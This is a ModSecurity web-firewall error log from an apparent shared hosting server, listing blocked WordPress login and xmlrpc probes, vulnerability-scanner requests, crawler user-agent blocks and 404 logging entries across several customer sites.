[Tue May 26 13:54:50.036998 2026] [security2:error] [pid 560287:tid 560504] [client 160.119.76.58:58008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVY0pmX5s6sDS3wJVcnDwAAANY"]
[Tue May 26 13:54:50.054425 2026] [security2:error] [pid 555743:tid 555952] [client 62.60.130.228:59296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahVY0sjqAquC0YaxQjDD4QAAAVk"], referer: https://www.facebook.com/
[Tue May 26 13:54:51.849870 2026] [security2:error] [pid 555743:tid 555959] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY08jqAquC0YaxQjDD8AAAAWA"]
[Tue May 26 13:54:52.979270 2026] [security2:error] [pid 560287:tid 560305] [remote 94.76.235.103:41492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVY1JmX5s6sDS3wJVcnMgAAyxE"]
[Tue May 26 13:54:53.109887 2026] [security2:error] [pid 560287:tid 560307] [remote 216.73.216.240:47863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2020a-Abhirami.php"] [unique_id "ahVY1ZmX5s6sDS3wJVcnOAAAtBM"]
[Tue May 26 13:54:53.161191 2026] [security2:error] [pid 560287:tid 560514] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY1JmX5s6sDS3wJVcnMAAAAOA"]
[Tue May 26 13:54:53.425948 2026] [security2:error] [pid 560287:tid 560306] [remote 216.73.216.240:47863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2015a-AiravataKandy.php"] [unique_id "ahVY1ZmX5s6sDS3wJVcnRAAAuRI"]
[Tue May 26 13:54:53.926977 2026] [security2:error] [pid 560287:tid 560335] [remote 216.73.216.240:47863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2012b-SasthaSagar.php"] [unique_id "ahVY1ZmX5s6sDS3wJVcnSAAAlC8"]
[Tue May 26 13:54:54.428124 2026] [security2:error] [pid 560287:tid 560321] [remote 216.73.216.240:47863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2024a-DivyaSampath.php"] [unique_id "ahVY1pmX5s6sDS3wJVcnTgAAqCE"]
[Tue May 26 13:54:54.910778 2026] [security2:error] [pid 555743:tid 555793] [remote 88.198.91.116:53618] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVY1sjqAquC0YaxQjDEBwABXzE"]
[Tue May 26 13:54:54.918652 2026] [security2:error] [pid 555743:tid 555750] [remote 173.249.21.166:45816] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.21.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVY1sjqAquC0YaxQjDECAABWgY"]
[Tue May 26 13:54:54.928752 2026] [security2:error] [pid 560287:tid 560303] [remote 216.73.216.240:47863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2022e-Vijay.php"] [unique_id "ahVY1pmX5s6sDS3wJVcnVwAA0A8"]
[Tue May 26 13:54:55.102446 2026] [security2:error] [pid 555743:tid 555944] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY1sjqAquC0YaxQjDEBgAAAVE"]
[Tue May 26 13:54:55.244644 2026] [security2:error] [pid 560287:tid 560539] [client 107.189.16.223:56531] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "consultrgb.com"] [uri "/Search-Replace-DB-master/"] [unique_id "ahVY15mX5s6sDS3wJVcnWQAAAPc"]
[Tue May 26 13:54:55.565899 2026] [security2:error] [pid 560287:tid 560443] [client 160.119.76.58:49834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVY15mX5s6sDS3wJVcnXgAAAJ0"]
[Tue May 26 13:54:55.932499 2026] [security2:error] [pid 560287:tid 560342] [remote 216.73.216.240:47863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-interiordesign.php"] [unique_id "ahVY15mX5s6sDS3wJVcnYgAAozY"]
[Tue May 26 13:54:56.028951 2026] [security2:error] [pid 560287:tid 560519] [client 160.119.76.58:49850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.76.119.160.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-login.php"] [unique_id "ahVY2JmX5s6sDS3wJVcnZAAAAOU"]
[Tue May 26 13:54:56.112884 2026] [security2:error] [pid 560287:tid 560551] [client 47.128.20.157:29910] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.rsmsi.org.in"] [uri "/robots.txt"] [unique_id "ahVY2JmX5s6sDS3wJVcnZwAAAQM"]
[Tue May 26 13:54:56.433767 2026] [security2:error] [pid 560287:tid 560325] [remote 216.73.216.240:47863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-quote.php"] [unique_id "ahVY2JmX5s6sDS3wJVcnbAAAzSU"]
[Tue May 26 13:54:56.848815 2026] [security2:error] [pid 560287:tid 560513] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY2JmX5s6sDS3wJVcnawAAAN8"]
[Tue May 26 13:54:56.934100 2026] [security2:error] [pid 560287:tid 560355] [remote 216.73.216.240:47863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2013a-Anand.php"] [unique_id "ahVY2JmX5s6sDS3wJVcnbgABAkI"]
[Tue May 26 13:54:56.996707 2026] [security2:error] [pid 560287:tid 560541] [client 129.222.147.134:52287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVY2JmX5s6sDS3wJVcnbQAAAPk"]
[Tue May 26 13:54:56.996855 2026] [security2:error] [pid 560287:tid 560541] [client 129.222.147.134:52287] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVY2JmX5s6sDS3wJVcnbQAAAPk"]
[Tue May 26 13:54:58.501833 2026] [security2:error] [pid 560287:tid 560419] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY2pmX5s6sDS3wJVcndAAAAIY"]
[Tue May 26 13:54:58.988736 2026] [security2:error] [pid 555743:tid 555835] [remote 156.59.198.136:34966] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "freshmindsolutions.com"] [uri "/wp-content/plugins/revslider/public/assets/assets/dummy.png"] [unique_id "ahVY2sjqAquC0YaxQjDEJQABC1s"], referer: https://freshmindsolutions.com
[Tue May 26 13:54:59.747934 2026] [security2:error] [pid 555743:tid 555991] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY28jqAquC0YaxQjDEKgAAAYA"]
[Tue May 26 13:55:00.233717 2026] [security2:error] [pid 560287:tid 560544] [client 106.192.248.115:56851] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVY3JmX5s6sDS3wJVcnhAAAAPw"]
[Tue May 26 13:55:00.233806 2026] [security2:error] [pid 560287:tid 560544] [client 106.192.248.115:56851] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVY3JmX5s6sDS3wJVcnhAAAAPw"]
[Tue May 26 13:55:01.488268 2026] [security2:error] [pid 560287:tid 560484] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY3ZmX5s6sDS3wJVcniQAAAMM"]
[Tue May 26 13:55:01.850347 2026] [security2:error] [pid 560287:tid 560476] [client 202.141.30.10:35355] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVY3ZmX5s6sDS3wJVcnkwAAALw"]
[Tue May 26 13:55:01.850526 2026] [security2:error] [pid 560287:tid 560476] [client 202.141.30.10:35355] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVY3ZmX5s6sDS3wJVcnkwAAALw"]
[Tue May 26 13:55:01.982528 2026] [security2:error] [pid 560287:tid 560455] [client 113.211.138.79:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY3ZmX5s6sDS3wJVcnkgAAAKg"]
[Tue May 26 13:55:03.753017 2026] [security2:error] [pid 560287:tid 560478] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY35mX5s6sDS3wJVcnogAAAL4"]
[Tue May 26 13:55:03.774903 2026] [security2:error] [pid 560287:tid 560374] [remote 5.45.96.74:54300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.96.45.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVY35mX5s6sDS3wJVcnpQAAuFU"]
[Tue May 26 13:55:04.191926 2026] [security2:error] [pid 560287:tid 560365] [remote 216.73.216.240:10109] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-services-architecture.php"] [unique_id "ahVY4JmX5s6sDS3wJVcnrAAAoUw"]
[Tue May 26 13:55:05.031648 2026] [security2:error] [pid 560287:tid 560358] [remote 216.73.216.240:10109] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2022a-Jeyaselan.php"] [unique_id "ahVY4ZmX5s6sDS3wJVcnuAAA70U"]
[Tue May 26 13:55:05.362478 2026] [security2:error] [pid 560287:tid 560526] [client 49.47.155.59:56630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 59.155.47.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/xmlrpc.php"] [unique_id "ahVY4ZmX5s6sDS3wJVcnvQAAAOw"]
[Tue May 26 13:55:05.362662 2026] [security2:error] [pid 560287:tid 560526] [client 49.47.155.59:56630] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "landsonlogistics.com"] [uri "/xmlrpc.php"] [unique_id "ahVY4ZmX5s6sDS3wJVcnvQAAAOw"]
[Tue May 26 13:55:05.457985 2026] [security2:error] [pid 560287:tid 560445] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY4ZmX5s6sDS3wJVcnuwAAAJ8"]
[Tue May 26 13:55:05.532453 2026] [security2:error] [pid 560287:tid 560382] [remote 216.73.216.240:10109] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-contact.php"] [unique_id "ahVY4ZmX5s6sDS3wJVcnwAAAx10"]
[Tue May 26 13:55:06.534963 2026] [security2:error] [pid 560287:tid 560367] [remote 216.73.216.240:10109] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-services-interiordesign.php"] [unique_id "ahVY4pmX5s6sDS3wJVcnxgAA2U4"]
[Tue May 26 13:55:07.036161 2026] [security2:error] [pid 560287:tid 560373] [remote 216.73.216.240:10109] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2024b-VijaySheaker.php"] [unique_id "ahVY45mX5s6sDS3wJVcnyQAAkFQ"]
[Tue May 26 13:55:07.106673 2026] [security2:error] [pid 555743:tid 555993] [client 129.222.147.134:40025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVY48jqAquC0YaxQjDESwAAAYI"]
[Tue May 26 13:55:07.106788 2026] [security2:error] [pid 555743:tid 555993] [client 129.222.147.134:40025] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVY48jqAquC0YaxQjDESwAAAYI"]
[Tue May 26 13:55:07.536720 2026] [security2:error] [pid 560287:tid 560380] [remote 216.73.216.240:10109] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/bhavish-architecture.php"] [unique_id "ahVY45mX5s6sDS3wJVcnywAAyVs"]
[Tue May 26 13:55:08.038148 2026] [security2:error] [pid 560287:tid 560356] [remote 216.73.216.240:10109] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2020c-DrJustin.php"] [unique_id "ahVY5JmX5s6sDS3wJVcnzwAAj0M"]
[Tue May 26 13:55:08.070442 2026] [security2:error] [pid 555743:tid 555903] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY48jqAquC0YaxQjDETwAAASg"]
[Tue May 26 13:55:08.928497 2026] [security2:error] [pid 555743:tid 555885] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY5MjqAquC0YaxQjDEVAAAARY"]
[Tue May 26 13:55:10.012146 2026] [security2:error] [pid 560287:tid 560461] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY5ZmX5s6sDS3wJVcn3QAAAK4"]
[Tue May 26 13:55:11.008314 2026] [security2:error] [pid 555743:tid 555951] [client 8.217.209.143:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVY5cjqAquC0YaxQjDEWgAAAVg"]
[Tue May 26 13:55:12.430216 2026] [security2:error] [pid 560287:tid 560542] [client 202.141.30.10:65511] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVY6JmX5s6sDS3wJVcn7wAAAPo"]
[Tue May 26 13:55:12.430363 2026] [security2:error] [pid 560287:tid 560542] [client 202.141.30.10:65511] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVY6JmX5s6sDS3wJVcn7wAAAPo"]
[Tue May 26 13:55:12.500892 2026] [security2:error] [pid 560287:tid 560436] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY6JmX5s6sDS3wJVcn7AAAAJc"]
[Tue May 26 13:55:14.599895 2026] [security2:error] [pid 555743:tid 555970] [client 43.98.176.47:46202] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "162.222.227.191"] [uri "/index.html"] [unique_id "ahVY6sjqAquC0YaxQjDEdQAAAWs"]
[Tue May 26 13:55:14.679587 2026] [security2:error] [pid 560287:tid 560458] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY6pmX5s6sDS3wJVcn-QAAAKs"]
[Tue May 26 13:55:15.994397 2026] [security2:error] [pid 560287:tid 560462] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY65mX5s6sDS3wJVcn_gAAAK8"]
[Tue May 26 13:55:17.314975 2026] [security2:error] [pid 555743:tid 555975] [client 129.222.147.134:27179] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVY7cjqAquC0YaxQjDEjgAAAXA"]
[Tue May 26 13:55:17.330863 2026] [security2:error] [pid 555743:tid 555975] [client 129.222.147.134:27179] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVY7cjqAquC0YaxQjDEjgAAAXA"]
[Tue May 26 13:55:17.529800 2026] [security2:error] [pid 555743:tid 555927] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVY7cjqAquC0YaxQjDEigAAAUA"]
[Tue May 26 13:55:18.775533 2026] [security2:error] [pid 560287:tid 560415] [remote 216.73.216.240:26734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2015b-ChettinadResturantTirupur.php"] [unique_id "ahVY7pmX5s6sDS3wJVcoEgAA_n4"]
[Tue May 26 13:55:19.109779 2026] [security2:error] [pid 560287:tid 560288] [remote 216.73.216.240:26734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bhavisharchitects.com.svijaykumar.in"] [uri "/2019c-ShreenayaasBoutique.php"] [unique_id "ahVY75mX5s6sDS3wJVcoGgAAugA"]
